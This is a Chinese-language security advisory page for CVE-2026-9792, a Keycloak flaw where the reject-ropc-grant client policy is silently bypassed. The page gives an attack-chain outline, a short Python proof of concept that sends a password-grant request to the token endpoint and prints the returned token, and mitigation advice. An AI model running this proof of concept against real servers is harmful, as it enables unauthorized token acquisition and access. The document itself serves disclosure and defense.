IPBUF安全漏洞报告
English
CVE-2026-9792 CVSS 6.5 中危

CVE-2026-9792 Keycloak ROPC策略绕过漏洞

披露日期: 2026-05-28

漏洞信息

漏洞编号
CVE-2026-9792
漏洞类型
认证绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Keycloak

相关标签

Keycloak认证绕过ROPCCVE-2026-9792权限绕过

漏洞概述

Keycloak的Client Policies组件存在安全绕过漏洞。当使用特定条件提供程序(如client-type、client-roles等)执行安全限制时,`reject-ropc-grant`执行器被静默绕过。未经身份验证的远程攻击者可利用此漏洞通过ROPC授权获取令牌,导致未授权访问和信息泄露。

技术细节

该漏洞位于Keycloak的`org.keycloak.protocol.oidc`组件中的Client Policies实现机制内。其核心问题在于,当管理员配置`reject-ropc-grant`执行器旨在阻止资源所有者密码凭据(ROPC)授权模式时,若同时启用了client-type、client-roles、client-attributes或client-scopes等特定条件提供程序,系统将产生逻辑冲突,导致安全策略被静默绕过。未经身份验证的远程攻击者无需进行用户交互,即可向令牌端点发送标准的ROPC请求。由于校验机制的失效,攻击者能够成功获取有效的访问令牌,从而在策略明令禁止的情况下实现未授权登录及敏感信息获取。

攻击链分析

STEP 1
侦察
攻击者识别目标Keycloak服务器及其令牌端点。
STEP 2
利用
攻击者向令牌端点发送包含grant_type=password的POST请求,尝试进行ROPC认证。
STEP 3
绕过
由于Client Policies配置缺陷,`reject-ropc-grant`执行器未生效,请求通过验证。
STEP 4
后渗透
服务器返回访问令牌,攻击者获得未授权的API访问权限。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-9792: Keycloak reject-ropc-grant bypass # This script demonstrates the bypass of the ROPC rejection policy. import requests def check_ropc_bypass(target_url, client_id, username, password): token_endpoint = f"{target_url}/protocol/openid-connect/token" # Payload for Resource Owner Password Credentials grant payload = { "grant_type": "password", "client_id": client_id, "username": username, "password": password } try: response = requests.post(token_endpoint, data=payload) if response.status_code == 200 and "access_token" in response.json(): print("[+] Vulnerability Confirmed: ROPC grant allowed despite policy.") print(f"[+] Access Token: {response.json().get('access_token')[:50]}...") else: print("[-] ROPC blocked or request failed.") except Exception as e: print(f"Error: {e}") # Example usage # check_ropc_bypass("https://keycloak.example.com/realms/master", "admin-cli", "user", "pass")

影响范围

Keycloak (具体受影响版本请参考官方安全公告)

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用Resource Owner Password Credentials (ROPC) grant类型,或者通过网络访问控制列表(ACL)严格限制令牌端点的访问来源,仅允许可信的IP地址访问。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表